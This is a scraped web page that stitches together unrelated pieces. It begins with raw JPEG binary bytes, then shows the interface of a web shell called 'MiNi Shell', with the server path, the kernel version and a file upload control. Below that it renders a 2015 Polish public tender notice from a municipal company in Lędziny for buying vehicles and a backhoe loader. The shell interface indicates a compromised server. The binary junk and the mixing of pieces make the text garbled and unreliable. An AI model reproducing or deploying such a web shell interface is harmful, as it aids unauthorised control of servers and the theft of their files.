JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/198022-N-2015.html

<p class="kh_header"><b>Lędziny: Kontrakt S2-S5 - Zakup i dostarczenie: 
(Część A) cysterny do przewozu wody pitnej - S2, 
(Część B) ciągnika rolniczego z niezbędnym osprzętem - S3, 
(Część C) samochodu do przewozu sprzętu specjalistycznego - S4, 
(Część D) koparko-ładowarki - S5.</b><br>
<b>Numer ogłoszenia: 198022 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej "PARTNER" Sp. z o.o. , ul. Lędzińska 47, 43-143 Lędziny, woj. śląskie, tel. 0-32 216 61 23, faks 0-32 326 70 56.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-partner.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrakt S2-S5 - Zakup i dostarczenie: 
(Część A) cysterny do przewozu wody pitnej - S2, 
(Część B) ciągnika rolniczego z niezbędnym osprzętem - S3, 
(Część C) samochodu do przewozu sprzętu specjalistycznego - S4, 
(Część D) koparko-ładowarki - S5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest: zakup i dostawa fabrycznie nowych:  
Część A - cysterny do przewozu wody pitnej - S2, 
Część B - ciągnika rolniczego z niezbędnym osprzętem - S3, 
Część C - samochodu do przewozu sprzętu specjalistycznego - S4, 
część D - koparko-ładowarki - S5.

Wymagania techniczne:

Część A - CYSTERNA DO PRZEWOZU WODY PITNEJ:

1. Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowej cysterny do przewozu wody pitnej, zabudowanej na przyczepie, spełniającej wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż:

rok produkcji 2015; 1 osiowa; pojemność 1000 l;powłoka ocynkowana z atestem na przewóz wody pitnej; piktogram z oznaczeniem WODA DO PICIA; cysterna stanowiąca zwartą, jednolitą konstrukcję z przyczepą; przyczepa wyposażona w zaczep (dostosowany do zamocowania na haku kulowym);

CZĘŚĆ B - CIĄGNIK ROLNICZY WRAZ Z NIEZBĘDNYM OSPRZĘTEM:
1. Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowego ciągnika rolniczego z przyczepą, ramieniem wysięgnikowym tylnym, głowicą koszącą, spełniającego wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, 
z późn. zm.), o parametrach nie gorszych niż:
                 
rok produkcji 2015; moc min. 95 KM 4-ro cylindrowy; napęd 4x4;skrzynia biegów mechaniczna; pompa hydrauliczna min 50 l/m;kabina ogrzewana, wentylowana, klimatyzowana, wyposażona w dodatkowe siedzisko, radio;dach otwierany; instalacja pneumatyczna 1 i 2 obwodowa;3 rozdzielacze EDC,3 pary wyjść hydraulicznych z tyłu;belka wraz z oświetleniem na dachu oraz logo Zamawiającego - PGK Partner Sp. z o.o.; 2 siłowniki wspomagające;udźwig min 5 000 kg;przedni TUZ (udźwig min. 2000 kg + obciążnik przedni); JOYSTICK sterujący przednim tuzem; ociążniki kół tylnych;  ogumienie poszerzone do rozmiaru 540 mm tył;belka z tzw. kogutem i nazwą Zamawiającego; 

Ciągnik rolniczy winien być wyposażony w: 
                                       
a) PRZYCZEPĘ  ROLNICZĄ 1 OSIOWĄ, o parametrach nie gorszych niż:
 
ładowność min 5 ton; powierzchnia ładunkowa min 8 m2;system wywrotu 3 stronny;hamulce pneumatyczne;koło zapasowe z mocowaniem;zaczep;minimalne zapotrzebowanie mocy ciągnika 35 KM;

b) RAMIĘ WYSIĘGNIKOWE TYLNE, o parametrach nie gorszych niż:

zasięg ramienia min. 5,5 m; pojemność zbiornika oleju  min 180 l;dopasowane do mocy ciągnika min. 80 KM;zaczep TUZ II; sterowanie elektryczne; 

c) GŁOWICĘ KOSZĄCĄ  

minimalna szerokość robocza 120 cm; min liczba noży 20; wymagany wydatek pompy  [l/min]  max 100; masa [kg] max  250; 

d) PŁUG ODŚNIEŻNY WRAZ Z RAMKĄ MOCUJĄCĄ

szerokość robocza min/ max 220/250 cm; hydrauliczny kąt skrętu w prawo i w lewo do 30o;masa  max 400 [kg];wysokość odkładnicy w zakresie min. 80 cm ÷ max 95 cm; wymagana ilość złączy hydraulicznych - 1x dwustronnego działania; wyposażony w odchylne sprężynowo listwy zgarniające; odboje. 

CZĘŚĆ C - SAMOCHÓD DO PRZEWOZU SPRZĘTU SPECJALISTYCZNEGO:
1. Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowego samochodu typ furgon z wysokim dachem, spełniającym wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż:

Wyposażenie: Bezpieczeństwo

asystent bocznego wiatru;ABS - system zapobiegający blokowaniu kół podczas hamowania;elektroniczny system stabilizacji toru jazdy uwzględniający obciążenie pojazdu;ASR - system zapobiegający poślizgowi kół napędzanych;EBV - elektroniczny korektor siły hamowania;BAS - asystent hamowania (wspomaganie hamowania awaryjnego);hamulce: przednie tarczowe wentylowane, tylne tarczowe pełne; poduszka bezpieczeństwa kierowcy;

Nadwozie
samonośne całkowicie stalowe, ocynkowane wszystkie drzwi, a także maska, błotniki, podłużnice i poprzecznice; boczne listwy ochronne; wszystkie szyby termoizolacyjne
- drzwi boczne przesuwne z prawej strony; tylne drzwi nieprzeszklone; dach lakierowany w kolorze nadwozia; lusterka zewnętrzne regulowane manualnie, ze zintegrowanymi kierunkowskazami

Układ przeniesienia napędu: napęd na koła tylne

Układ kierowniczy
hydrauliczne wspomaganie układu kierowniczego; blokada koła kierownicy

Wyposażenie funkcjonalne
immobiliser; centralny zamek sterowany pilotem; szyby w kabinie kierowcy sterowane elektrycznie; fotel kierowcy, z pełną regulacją (zakres regulacji fotela kierowcy: regulacja wzdłużna, regulacja oparcia oraz regulacja wysokości); siedzenie dwuosobowe obok kierowcy; dźwignia zmiany biegów w formie joysticka; schowek w desce rozdzielczej; gniazdo 12 V w kabinie kierowcy; koło zapasowe z koszem mocującym i zestawem narzędzi z podnośnikiem;

Przestrzeń ładunkowa
ściana działowa bez okna; przestrzeń ładunkowa wyłożona sklejką wraz z ścianami bocznymi do wysokości dachu; uchwyty do mocowania ładunku w przestrzeni ładunkowej; oświetlenie przestrzeni ładunkowej; podłoga stalowa (jako opcja dostępne wyłożenie podłogi)

Pozostałe parametry:
rok produkcji 2015;pojemność skokowa silnika min. 1900 max 2000 cm3;moc min. 100 kW; liczba cylindrów 4;rodzaj paliwa: olej napędowy wg DIN EN 590;norma emisji spalin EEV wg dyrektywy 2005/55/WE, wydanie 2008/74/WE lub rozporządzenia WE 715/2007 Euro 5; filtr cząstek stałych; 6-biegowa skrzynia manualna;napęd na tylne koła;przestrzeń ładunkowa 10,5 m3?0,5m3;boczne drzwi przesuwne szerokość /wysokość 1300/1820 mm ?50mm; tylne drzwi skrzydłowe szerokość/wysokość 1565/1840 mm ?50mm; średnica zawracania max 14 m; rozstaw osi max. 3665 mm; 
konfiguracja siedzeń: 3 siedzenia; klimatyzacja półautomatyczna z filtrem kurzu i pyłków z aktywnym węglem; radio wraz z zestawem głośnomówiącym z Bluetooth; 
kolor biały; wyposażenie dodatkowe: hak holowniczy z głowicą kulową; pokrowce na siedzenia, belka wraz z oświetleniem na dachu oraz logo Zamawiającego - PGK Partner Sp. z o.o.;  

CZĘŚĆ D - KOPARKO-ŁADOWARKA:
1. Przedmiotem zamówienia jest zakup i dostarczenia fabrycznie nowej koparko-ładowarki kołowej, spełniającej wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż: 

masa eksploatacyjna maszyny do 8200 kg; długość transportowa maszyny do 5,70 m;
silnik wysokoprężny o mocy znamionowej min 80 KM; napęd koparko-ładowarki na dwie osie, możliwość napędu na jedną oś; koła jezdne: przednie 18, tylne 26;
przednia oś wychylna, przednie koła skrętne; średnica zawracania koparko-ładowarki bez hamulca do 8,5 m; skrzynia biegów manualna, cztery biegi w przód, cztery biegi  w tył; z dźwignią zmiany biegów umieszczoną w podłodze, wybór kierunku jazdy za pomocą przełącznika, umieszczonego na kolumnie kierownicy;dwa niezależne układy hamowania, hamulec zasadniczy hydrauliczny, mokry, samoregulujący się;
system hydrauliczny umożliwiający dostosowanie wydajności układu hydraulicznego do bieżącego zapotrzebowania; układ hydrauliczny zasilany pompą wielotłoczkową o wydajności min 160 l/min; stabilizatory tylne niezależne, wysuwane hydraulicznie;
błotniki kół przednich, skrzynka narzędziowa, immobiliser;kabina operatora spełniająca wymagania konstrukcji ochronnej ROPS i FOPS z obrotowym fotelem operatora, wyciszona (poziom hałasu w kabinie nie większy niż 74 dB);

2. Osprzęt ładowarkowy koparko-ładowarki:

a) koparko-ładowarka musi posiadać system z równoległymi siłownikami przechylania 
łyżki, zapewniający samopoziomowanie łyżki ładowarkowej;
b) koparko-ładowarka musi posiadać układ stabilizacji łyżki ładowarkowej;
c) łyżka ładowarkowa dzielona [otwierana], wielofunkcyjna: 6 w jednym - możliwość spychania, ładowania, kopania, chwytania, rozściełania i wyrównywania;
d) na łyżce muszą być zamontowane widły do palet;
e) pojemność łyżki ładowarki 1,0 m3 z tolerancją ? 0,1 m3, szerokość łyżki do 2,5 m;
f) maksymalna wysokość załadunku co najmniej 3,0 m.
g) udźwig na pełną wysokość w łyżce ładowarkowej co najmniej 2 800 kg 
h) siła skrawania na łyżce ładowarkowej na poziomie gruntu nie mniej niż 65 kN;

3. Osprzęt koparkowy podsiębierny koparko-ładowarki:

a) musi posiadać możliwość przesuwu bocznego wysięgnika koparkowego;
b) łyżka koparkowa o szerokości 600 mm ? 20 mm i pojemności 0,2 m3 ? 0,06 m3;
c) ramię koparkowe o zmiennej długości, rozsuwane hydraulicznie (teleskopowe);
d) maksymalna głębokość kopania co najmniej 5,90 m; 
e) maksymalna wysokość załadunku przy złożonym ramieniu min. 3,5 m;
f) siła skrawania na łyżce koparkowej min. 57 kN, siła skrawania na ramieniu złożonym min. 30 kN.
g) udźwig przy złożonym ramieniu min. 1200 kg;
h) łyżka koparkowa skarpowa, szerokość min. 1200 mm o pojemności min. 0,12 m3;
i) łyżka koparkowa, szerokość 400 mm, o pojemności 0,04 m3;
j) szybkozłącze koparkowe;
  
4.	Wykonawca musi posiadać autoryzację producenta na terenie Polski.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.12-7, 16.70.00.00-2, 34.22.30.00-6, 34.14.42.20-6, 43.20.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium: dla całości zamówienia:
14.000,00 PLN
dla części A zamówienia: 1.000,00 PLN,
dla części B zamówienia: 5.000,00 PLN, 
dla części C zamówienia: 3.000,00 PLN,
dla części D zamówienia: 5.000,00 PLN, 
W przypadku składania oferty na więcej niż jedną część zamówienia, wadium winno stanowić sumę wadiów dla poszczególnych części zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wyznacza się warunków szczególnych w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej trzy dostawy:
dla części A zamówienia: cysterny do przewozu wody pitnej, zabudowanej na przyczepie;
dla części B zamówienia: ciągnika rolniczego z niezbędnym osprzętem;
dla części C zamówienia: samochodu z zabudowanym sprzętem specjalistycznym;
dla części D zamówienia: koparko-ładowarki.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wyznacza się warunków szczególnych w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wyznacza się warunków szczególnych w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wyznacza się warunków szczególnych w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy (według wzoru, stanowiącego Załącznik Nr 8 do SIWZ) potwierdzającego, że udział towarów pochodzących z państw członkowskich Unii Europejskiej lub państw, z którymi Wspólnota Europejska zawała umowy o równym traktowaniu przedsiębiorców, przekracza 50 % w oferowanym przedmiocie zamówienia w każdej z poszczególnych części zamówienia</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Koszt przeglądów gwarancyjnych w okresie gwarancji - 5</li>
<li>3 - Długość okresu gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
